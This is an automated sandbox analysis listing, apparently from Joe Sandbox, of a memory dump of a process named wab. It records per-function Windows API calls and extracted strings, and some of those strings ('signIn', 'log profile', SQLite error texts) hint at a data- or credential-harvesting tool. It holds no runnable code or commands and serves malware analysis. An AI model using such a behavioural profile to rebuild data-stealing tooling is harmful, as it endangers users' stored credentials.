                                                • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                • GetParent.USER32(?), ref: 00409FA5
                                                • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                • String ID:
                                                • API String ID: 2163313125-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??3@$wcslen
                                                • String ID:
                                                • API String ID: 239872665-3916222277
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memcpywcslen$_snwprintfmemset
                                                • String ID: %s (%s)$YV@
                                                • API String ID: 3979103747-598926743
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                • wcslen.MSVCRT ref: 0040A6B1
                                                • wcscpy.MSVCRT ref: 0040A6C1
                                                • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                • wcscpy.MSVCRT ref: 0040A6DB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                • String ID: Unknown Error$netmsg.dll
                                                • API String ID: 2767993716-572158859
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                • wcscpy.MSVCRT ref: 0040DAFB
                                                • wcscpy.MSVCRT ref: 0040DB0B
                                                • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                  • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: PrivateProfilewcscpy$AttributesFileString
                                                • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                • API String ID: 3176057301-2039793938
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                • too many attached databases - max %d, xrefs: 0042F64D
                                                • unable to open database: %s, xrefs: 0042F84E
                                                • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                • cannot ATTACH database within transaction, xrefs: 0042F663
                                                • out of memory, xrefs: 0042F865
                                                • database is already attached, xrefs: 0042F721
                                                • database %s is already in use, xrefs: 0042F6C5
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memcpymemset
                                                • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                • API String ID: 1297977491-2001300268
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                                                • memcpy.MSVCRT ref: 0040EB80
                                                • memcpy.MSVCRT ref: 0040EB94
                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                  • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                • String ID: ($d
                                                • API String ID: 1140211610-1915259565
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                • Sleep.KERNEL32(00000001), ref: 004178E9
                                                • GetLastError.KERNEL32 ref: 004178FB
                                                • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: File$ErrorLastLockSleepUnlock
                                                • String ID:
                                                • API String ID: 3015003838-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • memset.MSVCRT ref: 00407E44
                                                • memset.MSVCRT ref: 00407E5B
                                                • _mbscpy.MSVCRT ref: 00407E7E
                                                • _mbscpy.MSVCRT ref: 00407ED7
                                                • _mbscpy.MSVCRT ref: 00407EEE
                                                • _mbscpy.MSVCRT ref: 00407F01
                                                • wcscpy.MSVCRT ref: 00407F10
                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                • String ID:
                                                • API String ID: 59245283-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                • GetLastError.KERNEL32 ref: 0041855C
                                                • Sleep.KERNEL32(00000064), ref: 00418571
                                                • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                • GetLastError.KERNEL32 ref: 0041858E
                                                • Sleep.KERNEL32(00000064), ref: 004185A3
                                                • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: File$AttributesDeleteErrorLastSleep$??3@
                                                • String ID:
                                                • API String ID: 3467550082-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memcpy
                                                • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                • API String ID: 3510742995-3273207271
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                • memset.MSVCRT ref: 00413ADC
                                                • memset.MSVCRT ref: 00413AEC
                                                  • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                • memset.MSVCRT ref: 00413BD7
                                                • wcscpy.MSVCRT ref: 00413BF8
                                                • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                • String ID: 3A
                                                • API String ID: 3300951397-293699754
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                • wcscpy.MSVCRT ref: 0040D1B5
                                                  • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                  • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                • wcslen.MSVCRT ref: 0040D1D3
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                • memcpy.MSVCRT ref: 0040D24C
                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                • String ID: strings
                                                • API String ID: 3166385802-3030018805
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • memset.MSVCRT ref: 00411AF6
                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                • wcsrchr.MSVCRT ref: 00411B14
                                                • wcscat.MSVCRT ref: 00411B2E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: FileModuleNamememsetwcscatwcsrchr
                                                • String ID: AE$.cfg$General$EA
                                                • API String ID: 776488737-1622828088
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • memset.MSVCRT ref: 0040D8BD
                                                • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                • memset.MSVCRT ref: 0040D906
                                                • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                • _wcsicmp.MSVCRT ref: 0040D92F
                                                  • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                  • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                • String ID: sysdatetimepick32
                                                • API String ID: 1028950076-4169760276
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memcpy$memset
                                                • String ID: -journal$-wal
                                                • API String ID: 438689982-2894717839
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                • EndDialog.USER32(?,00000002), ref: 00405C83
                                                • EndDialog.USER32(?,00000001), ref: 00405C98
                                                  • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                  • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Item$Dialog$MessageSend
                                                • String ID:
                                                • API String ID: 3975816621-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • _wcsicmp.MSVCRT ref: 00444D09
                                                • _wcsicmp.MSVCRT ref: 00444D1E
                                                • _wcsicmp.MSVCRT ref: 00444D33
                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                  • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: _wcsicmp$wcslen$_memicmp
                                                • String ID: .save$http://$https://$log profile$signIn
                                                • API String ID: 1214746602-2708368587
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                • String ID:
                                                • API String ID: 2313361498-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetClientRect.USER32(?,?), ref: 00405F65
                                                • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                • GetWindow.USER32(00000000), ref: 00405F80
                                                  • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Window$ItemMessageRectSend$Client
                                                • String ID:
                                                • API String ID: 2047574939-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                • String ID:
                                                • API String ID: 4218492932-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                  • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                                                  • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                                                • memcpy.MSVCRT ref: 0044A8BF
                                                • memcpy.MSVCRT ref: 0044A90C
                                                • memcpy.MSVCRT ref: 0044A988
                                                  • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                                                  • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                                                • memcpy.MSVCRT ref: 0044A9D8
                                                • memcpy.MSVCRT ref: 0044AA19
                                                • memcpy.MSVCRT ref: 0044AA4A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memcpy$memset
                                                • String ID: gj
                                                • API String ID: 438689982-4203073231
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memcpy
                                                • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                • API String ID: 3510742995-2446657581
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                • memset.MSVCRT ref: 00405ABB
                                                • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                • SetFocus.USER32(?), ref: 00405B76
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: MessageSend$FocusItemmemset
                                                • String ID:
                                                • API String ID: 4281309102-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: _snwprintfwcscat
                                                • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                • API String ID: 384018552-4153097237
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ItemMenu$CountInfomemsetwcschr
                                                • String ID: 0$6
                                                • API String ID: 2029023288-3849865405
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                • memset.MSVCRT ref: 00405455
                                                • memset.MSVCRT ref: 0040546C
                                                • memset.MSVCRT ref: 00405483
                                                • memcpy.MSVCRT ref: 00405498
                                                • memcpy.MSVCRT ref: 004054AD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset$memcpy$ErrorLast
                                                • String ID: 6$\
                                                • API String ID: 404372293-1284684873
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                • wcscpy.MSVCRT ref: 0040A0D9
                                                • wcscat.MSVCRT ref: 0040A0E6
                                                • wcscat.MSVCRT ref: 0040A0F5
                                                • wcscpy.MSVCRT ref: 0040A107
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                • String ID:
                                                • API String ID: 1331804452-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                • String ID: advapi32.dll
                                                • API String ID: 2012295524-4050573280
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                • <?xml version="1.0" ?>, xrefs: 0041007C
                                                • <%s>, xrefs: 004100A6
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset$_snwprintf
                                                • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                • API String ID: 3473751417-2880344631
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: wcscat$_snwprintfmemset
                                                • String ID: %2.2X
                                                • API String ID: 2521778956-791839006
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: _snwprintfwcscpy
                                                • String ID: dialog_%d$general$menu_%d$strings
                                                • API String ID: 999028693-502967061
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memcpy$memsetstrlen
                                                • String ID:
                                                • API String ID: 2350177629-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset
                                                • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                • API String ID: 2221118986-1606337402
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                • String ID:
                                                • API String ID: 265355444-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                  • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                  • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                                                • memset.MSVCRT ref: 0040C439
                                                • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                • _wcsupr.MSVCRT ref: 0040C481
                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
